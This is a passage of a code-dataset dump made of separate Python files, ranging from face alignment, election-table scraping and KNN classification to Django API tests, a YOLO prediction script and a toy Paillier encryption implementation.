np.mean(folded1[okfinal1 * ~thermos, :], axis=0), 'b', lw=2, label='Valid TES average')\n plot(tt, np.mean(folded1[thermos, :], axis=0), 'r', lw=2, label='Thermometers')\n title('Fib = {} - ASIC 1'.format(fib))\n legend(loc='upper left', fontsize=8)\n subplot(2, 1, 2)\n plot(tt, np.mean(folded2[okfinal2 * ~thermos, :], axis=0), 'b', lw=2, label='Valid TES average')\n plot(tt, np.mean(folded2[thermos, :], axis=0), 'r', lw=2, label='Thermometers')\n title('Fib = {} - ASIC 2'.format(fib))\n\n return\n","sub_path":"qubic/plotters.py","file_name":"plotters.py","file_ext":"py","file_size_in_byte":6668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"576919873","text":"# USAGE\n# python align_faces.py --shape-predictor shape_predictor_68_face_landmarks.dat --image images/example_01.jpg\n\n# import the necessary packages\nfrom face_aligner import FaceAligner\nfrom imutils.face_utils import rect_to_bb\nimport argparse\nimport imutils\nimport dlib\nimport cv2\nfrom matplotlib import pyplot as plt\n\n\n# # construct the argument parser and parse the arguments\n# ap = argparse.ArgumentParser()\n# ap.add_argument(\"-p\", \"--shape-predictor\", required=True,\n# \thelp=\"path to facial landmark predictor\")\n# ap.add_argument(\"-i\", \"--image\", required=True,\n# \thelp=\"path to input image\")\n# args = vars(ap.parse_args())\n\n# initialize dlib's face detector (HOG-based) and then create\n# the facial landmark predictor and the face aligner\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')\nfa = FaceAligner(predictor, desiredFaceWidth=256)\n\n# load the input image, resize it, and convert it to grayscale\nimage = cv2.imread('images/example_01.jpg')\nimage = imutils.resize(image, width=800)\nRGB_im = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# show the original input image and detect faces in the grayscale\n# image\n# cv2.imshow(\"Input\", image)\nrects = detector(gray, 2)\n\n# loop over the face detections\nfor rect in rects:\n # extract the ROI of the *original* face, then align the face\n # using facial landmarks\n (x, y, w, h) = rect_to_bb(rect)\n faceOrig = imutils.resize(RGB_im[y:y + h, x:x + w], width=256)\n faceAligned = fa.align(image, gray, rect)\n faceAligned_RGB = cv2.cvtColor(faceAligned, cv2.COLOR_BGR2RGB)\n\n plt.figure(figsize=(15,15))\n\n plt.subplot(121)\n plt.imshow(faceOrig)\n\n plt.subplot(122)\n\n plt.imshow(faceAligned_RGB)\n plt.savefig('img1.png')","sub_path":"src/align_faces.py","file_name":"align_faces.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"268611874","text":"import re\nimport yaml\nfrom collections import defaultdict\nfrom tqdm import tqdm\n\nimport requests\nfrom bs4 import BeautifulSoup, Tag\n\nfrom countries_adapter import country_matching_re, get_common_name\n\n\nWIKI_URL = 'https://en.wikipedia.org'\n\n\nclass ElectionsParsingError(Exception):\n pass\n\n\ndef concat_substrings(tag):\n return (' '.join(s.strip() for s in tag.strings)).strip()\n\n\ndef parse_country_and_year(soup):\n main_div = soup.find(id='mw-content-text')\n country, year = None, None\n for paragraph in main_div.find_all('p'):\n text = concat_substrings(paragraph)\n try:\n if country is None:\n match = next(country_matching_re.finditer(text))\n country = get_common_name(match.group())\n except StopIteration:\n pass\n 
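# The same guarded-next idiom as for the country above: re.finditer may\n        # yield no 4-digit match, in which case next() raises StopIteration\n        # and year simply stays None.\n        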
try:\n if year is None:\n match = next(re.finditer(r'\\d{4,4}', text))\n year = match.group()\n except StopIteration:\n pass\n if country and year:\n return country, year\n raise ElectionsParsingError(\"Unable to parse country or year\")\n\n\ndef find_election_results_section(soup):\n for header in soup.find_all([\"h2\", \"h3\", \"h4\"]):\n for tag in header.contents:\n if tag.string == 'Results':\n return header\n raise ElectionsParsingError(\"Results table not found\")\n\n\ndef first_table_under_header(header):\n for tag in header.next_siblings:\n if tag.name == 'table':\n return tag\n raise ElectionsParsingError(\"Results table not found\")\n\n\ndef parse_table_for_election_results(table, headers_log):\n\n def find_string_idx_in_list_by_ordered_pattern_list(strings, patterns):\n for pattern in patterns:\n for i, string in enumerate(strings):\n if re.match(pattern, string, flags=re.IGNORECASE):\n return i\n return None\n\n def parse_vote_count(string):\n try:\n string = string.strip()\n string = string.replace(',', '')\n string = string.strip('%')\n string = string.split('(')[0]\n string = string.split('[')[0]\n return float(string)\n except Exception:\n raise ElectionsParsingError(f\"Error while parsing vote count '{string}'\")\n\n tbody = table.find('tbody')\n header_row = tbody.find('tr')\n\n column_headers = header_row.find_all('th')\n # use colspan attr to determine 'true' column indices\n # each column is repeated as many times as its colspan\n column_headers_plaincolumns = []\n for col in column_headers:\n try:\n repeat = int(col['colspan'])\n except Exception:\n repeat = 1\n for _ in range(repeat):\n column_headers_plaincolumns.append(col)\n\n column_names = [concat_substrings(th) for th in column_headers_plaincolumns]\n\n headers_log.write(' | '.join(column_names) + '\\n')\n columns_count = len(column_names)\n\n candidate_patterns = ['presidential candidate', 'candidate', 'electoral values']\n vote_patterns = ['electoral vote', 'vote', r'%', 'public vote', 'total']\n stopword_patterns = [r'.*round']\n candidate_i = find_string_idx_in_list_by_ordered_pattern_list(column_names, candidate_patterns)\n vote_i = find_string_idx_in_list_by_ordered_pattern_list(column_names, vote_patterns)\n if find_string_idx_in_list_by_ordered_pattern_list(column_names, stopword_patterns) is not None:\n raise ElectionsParsingError(\"Election with first and second round\")\n if candidate_i is None or vote_i is None:\n raise ElectionsParsingError(f\"Unable to identify candidate or vote column among {column_names}\")\n\n election_results = dict()\n for row in header_row.next_siblings:\n if not isinstance(row, Tag):\n # skip line-break strings\n continue\n if 'th' in {tag.name for tag in row.children}:\n # skip sub-header\n continue\n tds = row.find_all('td')\n if len(tds) < columns_count:\n # to detect and stop parsing on 'Total' row or something alike\n break\n if not concat_substrings(tds[0]):\n # to account for colored badges before first column\n i_shift = 1\n else:\n i_shift = 0\n\n candidate = concat_substrings(tds[i_shift + candidate_i])\n votes = parse_vote_count(concat_substrings(tds[vote_i]))\n if not candidate:\n raise ElectionsParsingError(f\"Error while parsing candidate: {tds[i_shift + candidate_i]}\")\n if re.match('total', candidate, flags=re.IGNORECASE):\n break\n election_results[candidate] = votes\n\n if not election_results:\n raise ElectionsParsingError(f\"No rows found: {tbody.prettify()}\")\n else:\n total = sum(election_results.values())\n return {cand: votes / total for cand, 
votes in sorted(election_results.items(), key=lambda item: item[1])}\n\n\ndef parse_and_save_election_page(election_page, output_stream):\n r = requests.get(WIKI_URL + election_page)\n soup = BeautifulSoup(r.text, 'html.parser')\n\n elections_data = defaultdict(dict)\n\n try:\n country, year = parse_country_and_year(soup)\n elections_data[election_page]['country'] = country\n elections_data[election_page]['year'] = year\n except ElectionsParsingError:\n pass\n\n with open('data/wiki_election_pages_parsing_errors.txt', 'a') as f:\n try:\n results_header = find_election_results_section(soup)\n table = first_table_under_header(results_header)\n with open('data/headers_log.txt', 'a') as headers_log:\n elections_data[election_page]['results'] = parse_table_for_election_results(table, headers_log)\n yaml.dump(dict(elections_data), output_stream)\n except ElectionsParsingError as e:\n f.write(f'Error while parsing {WIKI_URL + election_page}:\\n\\t{str(e)}\\n\\n')\n\n\npages_filename = 'data/election_wiki_pages.txt'\n\nwith open(pages_filename) as f:\n for total, l in enumerate(f):\n pass\ntotal += 1\n\nwith open(pages_filename, 'r') as pages_file, open('data/election_results.yaml', 'w') as results_file:\n for page in tqdm(pages_file, total=total):\n page = page.strip()\n parse_and_save_election_page(page, results_file)\n\n\n# sample_election_page = '/wiki/2006_Finnish_presidential_election'\n\n# with open('temp.yaml', 'w') as f:\n# parse_and_save_election_page(sample_election_page, f)\n","sub_path":"wiki_election_page_parser.py","file_name":"wiki_election_page_parser.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"144055668","text":"class Solution:\n def minSteps(self, s: str, t: str) -> int:\n # leetcode = {l:1, e:3, t:1, c:1, o:1, d:1 }\n # practice = {p:1, r:1, a:1, c:2, t:1, i:1, e:1}\n # h1 = [0]*26\n # h2 = [0]*26\n # for char in s:\n # h1[ord(char)-ord('a')]+=1\n # for char in t:\n # h2[ord(char)-ord('a')]+=1\n # # print(h1)\n # # print(h2)\n # ans = 0\n # for char in string.ascii_lowercase:\n # temp = h1[ord(char)-ord('a')] - h2[ord(char)-ord('a')]\n # ans+=max(0,temp)\n # return ans\n \n from collections import defaultdict, Counter\n # h1 = defaultdict(int)\n # h2 = defaultdict(int)\n # for char in s:\n # h1[char]+=1\n # for char in t:\n # h2[char]+=1\n h1 = Counter(s)\n h2 = Counter(t)\n ans = 0\n # print(h1,h2)\n for char in h1:\n ans += max(0,(h1[char] - h2[char]))\n return ans\n\nobj = Solution()\nprint(obj.minSteps(\"leetcode\",\"practice\"))","sub_path":"1347-Minimum-Number-of-Steps-to-Make-Two-Strings-Anagram.py","file_name":"1347-Minimum-Number-of-Steps-to-Make-Two-Strings-Anagram.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"322685471","text":"\"\"\"\nA base class for the various bar types. Includes the logic shared between classes, to minimise the amount of\nduplicated code.\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nfrom ._base_bars import _BaseBars\n\nclass TickBar(_BaseBars):\n \"\"\"\n Abstract base class which contains the structure which is shared between the various standard and information\n driven bars. 
There are some methods contained in here that would only be applicable to information bars but\n they are included here so as to avoid a complicated nested class structure.\n \"\"\"\n\n def __init__(self, threshold=None, dictcol=None):\n \"\"\"\n Constructor\n\n :param file_path: (String) Path to the csv file containing raw tick data in the format[date_time, price, volume]\n :param metric: (String) type of imbalance bar to create. Example: dollar_imbalance.\n :param batch_size: (Int) Number of rows to read in from the csv, per batch.\n \"\"\"\n # Base properties\n _BaseBars.__init__(self, threshold, dictcol)\n\n\n\n def _extract_bars(self, inputdf):\n \"\"\"\n This method is required by all the bar types and is used to create the desired bars.\n :param data: (DataFrame) Contains 3 columns - date_time, price, and volume.\n :return: (List) of bars built using the current batch.\n \"\"\"\n t_price = inputdf['price']\n ts = 0\n idx = []\n for i, _ in enumerate(t_price):\n ts += 1\n if ts >= self.threshold:\n idx.append(i)\n ts = 0\n continue\n return inputdf.iloc[idx,:].index.drop_duplicates()\n","sub_path":"custombar/_tickbar.py","file_name":"_tickbar.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"325790300","text":"import scipy\nimport numpy\nimport csv\nfrom matplotlib.mlab import PCA\n\n#every row in the *.mat file is 256*256 numbers representing gray scale values\n#for each pixel in an image. i.e. if XTrain.mat has 1000 lines than each line\n#will be made up of 256*256 numbers and there would be 1000 images in the file.\n#The following loads the image into a sciPy matrix where each row is a vector\n#of length 256*256, representing an image. This code will need to be switched\n#out if you have a different method of storing images.\n\nfp1 = open(\"train1.csv\")\nfp2 = open(\"train2.csv\")\n\ncsv_data_train = list(csv.reader(fp1,\"excel\"))\ncsv_data_test = list(csv.reader(fp2,\"excel\"))\n\nXtest = []\nfor i in range(1,len(csv_data_train)):\n Xtest.append(csv_data_train[i][0])\n\nYtest = []\n\nfor i in range(1,len(csv_data_test)):\n Ytest.append(csv_data_test[i][0])\n\nXtrain = []\n\nfor i in range(1,len(csv_data_train)):\n temp = [] \n for j in range(1,len(csv_data_train[i])):\n temp.append(csv_data_train[i][j])\n Xtrain.append(temp) \n \n\nYtrain = []\n\nfor i in range(1,len(csv_data_test)):\n temp = [] \n for j in range(1,len(csv_data_test[i])):\n temp.append(csv_data_test[i][j])\n Ytrain.append(temp) \n\n\nXtest = numpy.array(Xtest).astype(\"int\")\nYtest = numpy.array(Ytest).astype(\"int\")\nXtrain = numpy.array(Xtrain).astype(\"int\")\nYtrain = numpy.array(Ytrain).astype(\"int\")\n\n#Xtrain = scipy.io.loadmat('Xtrain.mat')[\"Xtrain\"]\n#Ytrain = scipy.io.loadmat('Ytrain.mat')[\"Ytrain\"]\n#Xtest = scipy.io.loadmat('Xtest.mat')[\"Xtest\"]\n#Ytest = scipy.io.loadmat('Ytest.mat')[\"Ytest\"]\n\n#learn(Xtest,Xtrain,Ytest,Ytrain,5) #this lowers the dimension from 256*256 to 5\n\ndef learn(testX,trainX,testY,trainY,n):\n pcmat = PCA(trainX)\n lowdimtrain=numpy.mat(trainX)*pcmat #lower the dimension of trainX\n lowdimtest=numpy.mat(testX)*pcmat #lower the dimension of testX\n #run some learning algorithm here using the low dimension matrices for example\n trainset = [] \n\n knnres = KNN(lowdimtrain, trainY, lowdimtest ,k)\n numloss=0\n for i in range(len(knnres)):\n if knnres[i]!=testY[i]:\n numloss+=1\n return numloss\n\n\"\"\"\ndef PCA(Xparam, n):\n X = numpy.mat(Xparam)\n Xtranspose = 
X.transpose()\n A=Xtranspose*X\n return eigs(A,n)\n\ndef eigs(M,k):\n [vals,vecs]=numpy.linalg.eig(M)\n return LM2ML(vecs[:k])\n\ndef LM2ML(lm):\n U=[[]]\n temp = []\n for i in lm: \n for j in range(len(i)):\n temp.append(i[0,j])\n U.append(temp)\n temp = []\n U=U[1:]\n return U\n\"\"\"\n\n\n\n\ndef KNN(trainset, Ytrainvec, testset, k):\n eucdist = scidist.cdist(testset,trainset,'sqeuclidean')\n res=[]\n for dists in eucdist:\n distup = zip(dists, Ytrainvec)\n minVals = []\n sumLabel=0;\n for it in range(k):\n minIndex = index_min(dists)\n (minVal,minLabel) = distup[minIndex]\n del distup[minIndex]\n dists=numpy.delete(dists,minIndex,0)\n if minLabel == 1:\n sumLabel+=1\n else:\n sumLabel-=1\n if(sumLabel>0):\n res.append(1)\n else:\n res.append(0)\n return res\n\nlearn(Xtest,Xtrain,Ytest,Ytrain,5) #this lowers the dimension from 256*256 to 5","sub_path":"KNN_classifier.py","file_name":"KNN_classifier.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"254324196","text":"import argparse\nimport os\nimport locale\n\nfrom playstationpresence.playstationpresence import PlaystationPresence\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--no-tray-icon\", help=\"Don't create a tray icon\", action=\"store_true\")\n args = parser.parse_args()\n\n pspresence = PlaystationPresence(locale.getdefaultlocale()[0])\n\n if args.no_tray_icon:\n pspresence.mainloop(notifier=None)\n else:\n from winstray import MenuItem as item\n from winstray._win32 import Icon, loadIcon\n\n image = loadIcon(os.path.join(os.path.dirname(__file__), 'logo.ico'))\n menu = [item('Quit', pspresence.quit)]\n\n icon: Icon = Icon(\"playstationpresence\", image, \"playstationpresence\", menu)\n icon.icon = image\n icon.run(pspresence.mainloop)\n\nif __name__ == \"__main__\":\n main()","sub_path":"presence.py","file_name":"presence.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"344603362","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 21 00:13:05 2018\n\n@author: roberto\n\"\"\"\n\n# coding=utf-8\n\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nfrom nltk.stem.snowball import SnowballStemmer\nimport unicodedata\n\n \n\ndef CleansingText(text):\n print(type(text))\n text = unicodedata.normalize('NFD', text.decode('utf-8')).encode('ascii', 'ignore').decode('utf-8')\n stop = set(stopwords.words('spanish'))\n \n \n punct = set(['“','”','!','\"','#','$','%','&','/','(',')','=','?','¿','*','[',']','{','}','-','_','*','¡','.',':',';',',','^','>','<','@','...','+',\"'\", ' ', 'b', 'c', 'd', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'p', 'q', 'r', 's', 't', 'w', 'x', 'y', 'z'])\n stop.update(['rt'])\n \n \n stop.remove('no')\n stop.remove('ni')\n stop.remove('sin')\n stop.remove('mucho')\n stop.remove('muchos')\n stop.remove('todos')\n stop.remove('contra')\n \n stemmer = SnowballStemmer(\"spanish\")\n wstopText = []\n wstopText2 =[]\n wStopList = []\n\n # text = unicodedata.normalize('NFD', decode('utf-8')).encode('ascii', 'ignore').decode('utf-8')\n text = text.lower()\n\n for word in text.split():\n if word not in stop and 'http' not in word and 'https' not in word and word not in punct:\n wstopText.append(word)\n \n toker = RegexpTokenizer(r'((?<=[^\\w\\s])\\w(?=[^\\w\\s])|(\\W))+', gaps=True)\n wstopText = toker.tokenize(' 
'.join(wstopText))\n\n    for word in wstopText:\n        if word not in punct:\n            wstopText2.append(word)\n\n    for word in wstopText2:\n        wstopText2 = [stemmer.stem(s) for s in wstopText2]\n        wStopList.append(' '.join(wstopText2))\n        break\n\n    if len(wStopList):\n        return wStopList\n    return ''\n\nprint(CleansingText(\"- https http rt MONTERREY TUVO OTRO AÑO PERDIDO EN EL COMBATE A LA CONTAMINACIÓN - Me sumo a la iniciativa #respiramonterrey par… https://t.co/mR28K81VIW\"))","sub_path":"EnviromentTextClustering/cleaningText.py","file_name":"cleaningText.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}{"seq_id":"93955347","text":"from django.test import TestCase, Client\nfrom django.urls import reverse, resolve\nfrom rest_framework import status\nfrom api.views import *\nimport json\n\n\nclass TestCompanyViews(TestCase):\n\n    def setUp(self):\n        self.client = Client()\n        self.company_url = reverse('company')\n        self.company_detail_url = reverse(\"company_detail\", args=['1'])\n        self.company1 = Company.objects.create(\n            name=\"asd\",\n            employee_number=2499,\n            established=1990\n        )\n\n    def test_check(self):\n        assert 1 == 1\n\n    def test_company_GET(self):\n        response = self.client.get(self.company_url)\n        self.assertEquals(response.status_code, status.HTTP_200_OK)\n\n    def test_company_detail_GET(self):\n        response = self.client.get(self.company_detail_url)\n        company1 = Company.objects.get(id=1)\n        self.assertEquals(response.status_code, status.HTTP_200_OK)\n        self.assertEquals(company1.name, \"asd\")\n        self.assertEquals(company1, self.company1)\n\n    def test_company_POST(self):\n        response = self.client.post(self.company_url, {\n            \"name\": \"samsung\",\n            \"employee_number\": 25,\n            \"established\": 1678\n        })\n        self.assertEquals(response.status_code, status.HTTP_201_CREATED)\n        self.assertEquals(Company.objects.get(id=2).name, \"samsung\")\n        self.assertEquals(Company.objects.count(), 2)\n\n    def test_company_DELETE(self):\n        response = self.client.delete(self.company_detail_url)\n        self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)\n        self.assertEquals(Company.objects.count(), 0)\n\n\nclass TestUserViews(TestCase):\n    def setUp(self):\n        self.client = Client()\n        self.signup_url = reverse('signup')\n        self.login_url = reverse('login')\n        self.logout_url = reverse('logout')\n        self.user = User.objects.create(\n            username=\"admin\",\n            password=\"admin\",\n            email=\"aseke@gmail.com\"\n        )\n        self.data = {\n            \"username\": \"aseke\",\n            \"password\": \"admin\",\n            \"email\": \"jokker@mail.com\"\n        }\n\n    def test_check(self):\n        assert 1 + 1 == 2\n\n    def test_signup(self):\n        response = self.client.post(self.signup_url, self.data)\n        self.assertEquals(response.status_code, status.HTTP_201_CREATED)\n        self.assertEquals(User.objects.count(), 2)\n\n    def test_login(self):\n        self.client.post(self.signup_url, self.data)\n        response = self.client.post(self.login_url, {\n            \"username\": \"aseke\",\n            \"password\": \"admin\"\n        })\n        self.assertEquals(response.status_code, status.HTTP_200_OK)\n        self.assertEquals(User.objects.get(id=2).email, \"jokker@mail.com\")\n\n    def test_logout(self):\n        self.client.post(self.signup_url, self.data)\n        response1 = self.client.post(self.login_url, {\n            \"username\": \"aseke\",\n            \"password\": \"admin\"\n        })\n        token = response1.data['token']\n        token = \"Token {}\".format(token)\n        response2 = self.client.post(self.logout_url, HTTP_AUTHORIZATION=token)\n        self.assertEquals(response2.status_code, 
status.HTTP_204_NO_CONTENT)\n\n\nclass TestReviewViews(TestCase):\n\n    def setUp(self):\n        self.client = Client()\n        self.review_url = reverse('review')\n        self.review_detail_url = reverse(\"review_info\", args=['1'])\n        self.review_detail_url2 = reverse(\"review_info\", args=['2'])\n        self.signup_url = reverse('signup')\n        self.login_url = reverse('login')\n        self.data = {\n            \"username\": \"aseke\",\n            \"password\": \"admin\",\n            \"email\": \"jokker@mail.com\"\n        }\n        self.client.post(self.signup_url, self.data)\n        response1 = self.client.post(self.login_url, {\n            \"username\": \"aseke\",\n            \"password\": \"admin\"\n        })\n        self.company = Company.objects.create(\n            name=\"apple\",\n            employee_number=2499909,\n            established=1990\n        )\n        token = response1.data['token']\n        self.token = \"Token {}\".format(token)\n        self.review_info = {\n            \"rating\": 1,\n            \"title\": \"not working\",\n            \"summary\": \"please fix it\",\n            \"company_id\": 1\n        }\n\n    def test_check(self):\n        assert 1 + 1 == 2\n\n    def test_review_CREATE(self):\n        for i in range(8):\n            response = self.client.post(self.review_url, self.review_info, HTTP_AUTHORIZATION=self.token)\n        response2 = self.client.post(self.review_url, {\n            \"rating\": 6,\n            \"title\": \"not working\",\n            \"summary\": \"please fix it\",\n            \"company_id\": 1\n        }, HTTP_AUTHORIZATION=self.token)\n        self.assertEquals(Review.objects.count(), 8)\n        self.client.post(self.review_url, self.review_info, HTTP_AUTHORIZATION=self.token)\n        self.assertEquals(response.status_code, status.HTTP_201_CREATED)\n        self.assertEquals(response2.status_code, status.HTTP_400_BAD_REQUEST)\n\n    def test_review_DELETE(self):\n        for i in range(8):\n            self.client.post(self.review_url, self.review_info, HTTP_AUTHORIZATION=self.token)\n        self.client.delete(self.review_detail_url, HTTP_AUTHORIZATION=self.token)\n        response = self.client.delete(self.review_detail_url2, HTTP_AUTHORIZATION=self.token)\n        self.assertEquals(Review.objects.count(), 6)\n        self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)\n\n    def test_review_GET(self):\n        self.client.post(self.review_url, self.review_info, HTTP_AUTHORIZATION=self.token)\n        self.client.post(self.review_url, {\n            \"rating\": 5,\n            \"title\": \"good working\",\n            \"summary\": \"very good\",\n            \"company_id\": 1\n        }, HTTP_AUTHORIZATION=self.token)\n        response = self.client.get(self.review_detail_url, HTTP_AUTHORIZATION=self.token)\n        response2 = self.client.get(self.review_detail_url2, HTTP_AUTHORIZATION=self.token)\n        self.assertEquals(response.status_code, status.HTTP_200_OK)\n        self.assertEquals(response2.status_code, status.HTTP_200_OK)\n        self.assertEquals(response.data['rating'], 1)\n        self.assertEquals(response.data['title'], \"not working\")\n        cmp = vars(Company.objects.get(id=1))\n        del cmp['_state']\n        self.assertEquals(dict(response2.data['company']), cmp)\n","sub_path":"project/api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}{"seq_id":"565103067","text":"import fin_gif_complete as fg\nfrom sklearn.datasets import load_boston\nimport pandas as pd\n\ndef main(out_name='boston.gif'):\n\n    db = load_boston()\n    df = pd.DataFrame(db['data'], columns=db['feature_names'])\n\n    x = df['RM'].values\n    y = df['TAX'].values\n\n    print('ROOM STATS')\n    fg.print_table(*fg.stats_table(x))\n\n    print('')\n    print('TAX STATS')\n    fg.print_table(*fg.stats_table(y))\n\n    reg, coefs, interps = fg.sgd_regression(x, y)\n    fg.print_reg(reg)\n    fg.make_gif(x, y, interps, coefs, 50, 
save_name=out_name)\n\nif __name__ == '__main__':\n\n main()","sub_path":"intro-to-python-proj/assets/boston.py","file_name":"boston.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"651263492","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.template.defaultfilters import slugify\nfrom river.models.factories import ProceedingMetaObjectFactory\nfrom river.services.proceeding_meta import ProceedingMetaService\n\n\ndef set_slug(apps, schema_editor):\n # We can't import the State model directly as it may be a newer\n # version than this migration expects. We use the historical version.\n State = apps.get_model(\"river\", \"State\")\n\n for s in State.objects.all():\n s.slug = slugify(s.label)\n s.save()\n\n\ndef build_tree(apps, schema_editor):\n # We can't import the ProceedingMeta model directly as it may be a newer\n # version than this migration expects. We use the historical version.\n ProceedingMeta = apps.get_model(\"river\", \"ProceedingMeta\")\n\n for pm in ProceedingMeta.objects.all():\n ProceedingMetaService.build_tree(pm)\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('river', '0003_proceedingmeta_parents'),\n ]\n\n operations = [\n migrations.RunPython(set_slug),\n migrations.RunPython(build_tree)\n ]\n","sub_path":"venv/Lib/site-packages/river/migrations/0004_data_fix.py","file_name":"0004_data_fix.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"282530376","text":"from nets.yolo3 import yolo_body\nfrom keras.layers import Input\nfrom yolo import YOLO\nfrom PIL import Image\nimport numpy as np\nfrom datetime import datetime\n\n\n\nif __name__ == '__main__':\n yolo = YOLO()\n # x = 10\n # photo = []\n # with open('2007_test.txt') as f:\n # file = f.readlines()\n # # print(file[0])\n # for line in file:\n # photo.append(line.split()[0])\n # np.random.seed(int(datetime.timestamp(datetime.now())))\n # np.random.shuffle(photo)\n # np.random.seed(None)\n # for i in range(x):\n if True:\n # img = input('Input image filename:')\n img = 'E:/CMPE_master_project/photo/v1780.jpg'\n # print(photo[i])\n try:\n image = Image.open(img)\n except:\n print('Open Error! Try again!')\n # continue\n else:\n # [[type,[top,left,bottom,right],score]\n boxes = yolo.detect_image_boxes(image)\n print(boxes)\n r_image = yolo.detect_image(image)\n r_image.show()\n yolo.close_session()\n","sub_path":"model/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"125991719","text":"# -*- coding: utf-8 -*-\r\n\r\nimport sympy\r\nfrom Crypto.Random import random\r\nfrom Crypto.Util.number import getPrime\r\n\r\n\r\ndef findModReverse(a, m): # extended Euclidean algorithm for the modular inverse: solve ax = 1 mod m\r\n a = int(a)\r\n if gcd(a, m) != 1 and gcd(a, m) != -1:\r\n return None\r\n u1, u2, u3 = 1, 0, a\r\n v1, v2, v3 = 0, 1, m\r\n while v3 != 0:\r\n q = u3 // v3\r\n v1, v2, v3, u1, u2, u3 = (u1 - q * v1), (u2 - q * v2), (u3 - q * v3), v1, v2, v3\r\n return u1 % m\r\n\r\n\r\ndef gcd(a, b): # Euclidean algorithm for the greatest common divisor of a and b\r\n if a % b == 0:\r\n return b\r\n else:\r\n return gcd(b, a % b)\r\n\r\n\r\ndef lcm(a, b):\r\n return a // gcd(a, b) * b\r\n\r\n\r\ndef L(u, n):\r\n if (u - 1) % n > 0:\r\n return None\r\n return (u - 1) // n\r\n\r\ndef powmod(a, b, c):\r\n a = a % c\r\n ans = 1\r\n b = int(b)\r\n while b != 0:\r\n if b & 1:\r\n ans = (ans * a) % c\r\n b >>= 1\r\n a = (a * a) % c\r\n return ans\r\n\r\ndef paillier_encryption(m, g, r, n): # encryption operation\r\n c = powmod(g, m, n ** 2) * powmod(r, n, n ** 2) % (n ** 2)\r\n return c\r\n\r\n\r\ndef paillier_decryption(c, g, lamda, n, u):\r\n m = L(powmod(c, lamda, n ** 2), n) * u % n\r\n return m\r\n\r\n\r\ndef key_generation():\r\n p = getPrime(512)\r\n q = getPrime(512)\r\n if p == q:\r\n q = getPrime(128)\r\n n = p * q\r\n lamda = lcm(p - 1, q - 1)\r\n # print(lamda)\r\n\r\n while gcd(n, lamda) > 1:\r\n q = getPrime(512)\r\n if p == q:\r\n q = getPrime(128)\r\n n = p * q\r\n lamda = lcm(p - 1, q - 1)\r\n\r\n g = n + 1\r\n r = random.randint(1, n)\r\n\r\n u = findModReverse(L(powmod(g, lamda, n ** 2), n), n)\r\n # print(g)\r\n return n, g, r, lamda, u\r\n\r\n\r\ndef paillier_generation():\r\n n, g, r, lamda, u = key_generation()\r\n return n, g, r, lamda, u\r\n\r\n\r\n# if __name__ == \"__main__\":\r\n# n, g, r, lamda, u = paillier_generation() # key generation: public key (n, g), private key (lamda, u)\r\n#\r\n# m = 10001\r\n# print(\"n\", n)\r\n# print(\"g\", g)\r\n# print(\"r\", r)\r\n# print(\"lamda\", lamda)\r\n# print(\"u\", u)\r\n# c = paillier_encryption(m, r, n) # encryption function\r\n# m = paillier_decryption(c, g, lamda, n, u) # decryption function\r\n# print(c)\r\n# print(m)\r\n","sub_path":"client/myapp/paillier.py","file_name":"paillier.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"40337532","text":"import numpy as np\nimport pandas as pd\nimport scipy.stats\nfrom numpyro.infer import MCMC\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import transforms\nfrom matplotlib.patches import Rectangle\n\nfrom code.calibration import calculate_quantiles, calibrate_posterior_predictive\nfrom code.inference import run_diagnostics\nfrom code.metrics import calibration_error, picp\n\n# Colors used for plotting the posterior predictives\nCOLORS = {\n \"true\": \"tab:orange\",\n \"predicted\": \"tab:blue\",\n \"calibrated\": \"tab:pink\",\n \"observations\": \"lightgrey\",\n}\n# Transparency for the posterior predictives\nFILL_ALPHA = 0.15\n\n\ndef plot_true_function(\n func, df, point_estimate=\"mean\", interval=0.95, title=None, legend=True, ax=None\n):\n \"\"\"Plot the true function and the observations\n\n Args:\n
